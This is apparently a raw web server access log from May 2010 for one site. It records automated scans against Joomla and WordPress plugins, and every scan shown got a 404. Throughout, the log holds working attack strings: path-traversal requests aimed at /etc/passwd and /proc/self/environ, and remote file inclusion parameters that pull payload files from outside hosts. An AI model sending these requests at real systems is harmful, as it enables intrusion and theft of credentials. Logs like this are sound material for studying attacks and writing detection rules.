67.19.33.58 - - [05/May/2010:23:21:35 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.19.33.58 - - [05/May/2010:23:21:35 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.19.33.58 - - [05/May/2010:23:23:09 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.19.33.58 - - [05/May/2010:23:23:09 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.19.33.58 - - [05/May/2010:23:23:09 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
209.126.254.139 - - [05/May/2010:23:41:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
72.251.194.82 - - [05/May/2010:23:47:25 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "elfagr.net"
189.108.172.26 - - [05/May/2010:23:49:30 -0700] "GET /logs/access_091119.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
189.108.172.26 - - [05/May/2010:23:49:30 -0700] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
189.108.172.26 - - [05/May/2010:23:49:33 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
189.108.172.26 - - [05/May/2010:23:50:39 -0700] "GET /logs/access_091119.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
189.108.172.26 - - [05/May/2010:23:50:30 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
189.108.172.26 - - [05/May/2010:23:50:39 -0700] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
189.108.172.26 - - [05/May/2010:23:52:38 -0700] "GET /logs/access_091029.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
189.108.172.26 - - [05/May/2010:23:53:02 -0700] "GET /logs/access_091119.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
189.108.172.26 - - [05/May/2010:23:52:54 -0700] "GET /logs/access_091029.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
189.108.172.26 - - [05/May/2010:23:52:59 -0700] "GET /logs/access_091119.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
174.133.197.114 - - [05/May/2010:23:55:32 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [05/May/2010:23:55:40 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
222.236.47.182 - - [05/May/2010:23:56:02 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.236.47.182 - - [05/May/2010:23:56:02 -0700] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.236.47.182 - - [05/May/2010:23:56:10 -0700] "GET /logs/access_091119.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.236.47.182 - - [05/May/2010:23:58:32 -0700] "GET /logs/access_091126.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.236.47.182 - - [06/May/2010:00:00:05 -0700] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.236.47.182 - - [05/May/2010:23:59:56 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.236.47.182 - - [05/May/2010:23:59:56 -0700] "GET /logs/access_091119.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
222.236.47.182 - - [06/May/2010:00:02:13 -0700] "GET /logs/access_091126.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
72.251.194.82 - - [06/May/2010:00:09:11 -0700] "GET /logs/access.log/index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "elfagr.net"
72.251.194.82 - - [06/May/2010:00:09:03 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "elfagr.net"
72.251.194.82 - - [06/May/2010:00:09:03 -0700] "GET /logs/index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:11:20 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:11:23 -0700] "GET /logs/access.log/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:11:32 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:11:24 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:11:27 -0700] "GET /logs/access.log/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:11:27 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:11:36 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:23:53 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:24:00 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:25:42 -0700] "GET /logs/access.log/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:25:33 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:25:42 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
81.214.249.169 - - [06/May/2010:00:28:15 -0700] "GET /logs/access_100505.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "www.elfagr.net"
81.214.249.169 - - [06/May/2010:00:28:26 -0700] "GET /logs/access_100506.log HTTP/1.0" 200 756593 "-" "Wget/1.11.4" "www.elfagr.net"
202.162.219.163 - - [06/May/2010:00:30:05 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:31:58 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:31:58 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:32:07 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:32:08 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:31:59 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:00:31:59 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
202.162.219.163 - - [06/May/2010:00:38:16 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
202.162.219.163 - - [06/May/2010:00:38:17 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
202.162.219.163 - - [06/May/2010:00:38:17 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
86.96.226.87 - - [06/May/2010:00:47:14 -0700] "GET /ed_3.html HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; GTB6.4; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MS-RTC LM 8; InfoPath.1)" "www.elfagr.net"
209.126.254.139 - - [06/May/2010:00:52:40 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
91.191.173.120 - - [06/May/2010:00:55:10 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.185.231.103 - - [06/May/2010:00:58:07 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.191.173.120 - - [06/May/2010:01:04:19 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.191.173.120 - - [06/May/2010:01:04:19 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.191.173.120 - - [06/May/2010:01:04:19 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.185.231.103 - - [06/May/2010:01:07:26 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.191.173.120 - - [06/May/2010:01:14:16 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.191.173.120 - - [06/May/2010:01:14:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.191.173.120 - - [06/May/2010:01:14:17 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
174.142.68.135 - - [06/May/2010:01:31:42 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
209.126.254.139 - - [06/May/2010:01:53:15 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
209.126.254.139 - - [06/May/2010:01:53:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
174.133.197.114 - - [06/May/2010:02:06:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
213.91.132.141 - - [06/May/2010:02:20:53 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
74.208.184.209 - - [06/May/2010:02:23:55 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://elitesitter.com/images/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.208.184.209 - - [06/May/2010:02:23:55 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://elitesitter.com/images/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.208.184.209 - - [06/May/2010:02:23:55 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://elitesitter.com/images/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
64.251.10.117 - - [06/May/2010:02:24:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
74.208.184.209 - - [06/May/2010:02:31:15 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://elitesitter.com/images/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
64.251.10.117 - - [06/May/2010:02:32:39 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [06/May/2010:02:32:31 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [06/May/2010:02:32:31 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
213.91.132.141 - - [06/May/2010:02:40:15 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
213.91.132.141 - - [06/May/2010:02:40:24 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
213.91.132.141 - - [06/May/2010:02:40:16 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
212.175.146.45 - - [06/May/2010:02:53:17 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
212.175.146.45 - - [06/May/2010:03:00:16 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
212.175.146.45 - - [06/May/2010:03:00:17 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
212.175.146.45 - - [06/May/2010:03:00:17 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "elfagr.net"
212.175.146.45 - - [06/May/2010:03:03:22 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.elfagr.net"
93.158.149.32 - - [06/May/2010:03:12:22 -0700] "GET /logs/access_100204.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
72.1.240.149 - - [06/May/2010:03:20:52 -0700] "GET /logs//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
72.1.240.149 - - [06/May/2010:03:20:52 -0700] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
72.1.240.149 - - [06/May/2010:03:20:44 -0700] "GET /logs/access.log%20%20//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
72.1.240.149 - - [06/May/2010:03:22:58 -0700] "GET /logs/access.log//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
72.1.240.149 - - [06/May/2010:03:22:49 -0700] "GET /logs//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
72.1.240.149 - - [06/May/2010:03:22:49 -0700] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
187.45.193.159 - - [06/May/2010:03:26:29 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.solidlawyers.com/includes/js/dtree/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
187.45.193.159 - - [06/May/2010:03:26:33 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.solidlawyers.com/includes/js/dtree/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
187.45.193.159 - - [06/May/2010:03:26:25 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.solidlawyers.com/includes/js/dtree/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.175.146.45 - - [06/May/2010:03:29:04 -0700] "GET /logs/access_091126.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.elfagr.net"
212.175.146.45 - - [06/May/2010:03:29:04 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.elfagr.net"
212.175.146.45 - - [06/May/2010:03:29:04 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.elfagr.net"
174.133.197.114 - - [06/May/2010:03:33:20 -0700] "GET /index.php?option=com_securityimages&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:03:41:06 -0700] "GET /logs/access.log/index.php?option=com_securityimages&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:03:40:57 -0700] "GET /index.php?option=com_securityimages&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:03:40:57 -0700] "GET /logs/index.php?option=com_securityimages&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
67.205.38.15 - - [06/May/2010:03:46:17 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.38.15 - - [06/May/2010:03:46:17 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.38.15 - - [06/May/2010:03:46:17 -0700] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.2.183 - - [06/May/2010:03:51:26 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.2.183 - - [06/May/2010:03:51:34 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.2.183 - - [06/May/2010:03:51:34 -0700] "GET /logs/access.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.2.183 - - [06/May/2010:03:51:42 -0700] "GET /logs/access.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.2.183 - - [06/May/2010:03:51:42 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.2.183 - - [06/May/2010:03:51:33 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
202.162.219.163 - - [06/May/2010:04:05:35 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
202.162.219.163 - - [06/May/2010:04:16:35 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
202.162.219.163 - - [06/May/2010:04:16:36 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
202.162.219.163 - - [06/May/2010:04:16:28 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
200.62.142.217 - - [06/May/2010:04:17:20 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
200.62.142.217 - - [06/May/2010:04:17:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
200.62.142.217 - - [06/May/2010:04:17:12 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
67.205.2.183 - - [06/May/2010:04:18:36 -0700] "GET /errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.2.183 - - [06/May/2010:04:18:36 -0700] "GET /logs/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.2.183 - - [06/May/2010:04:18:44 -0700] "GET /logs/access.log/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.2.183 - - [06/May/2010:04:19:19 -0700] "GET /logs/access.log/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.2.183 - - [06/May/2010:04:19:10 -0700] "GET /logs/errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.2.183 - - [06/May/2010:04:19:10 -0700] "GET /errors.php?error=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
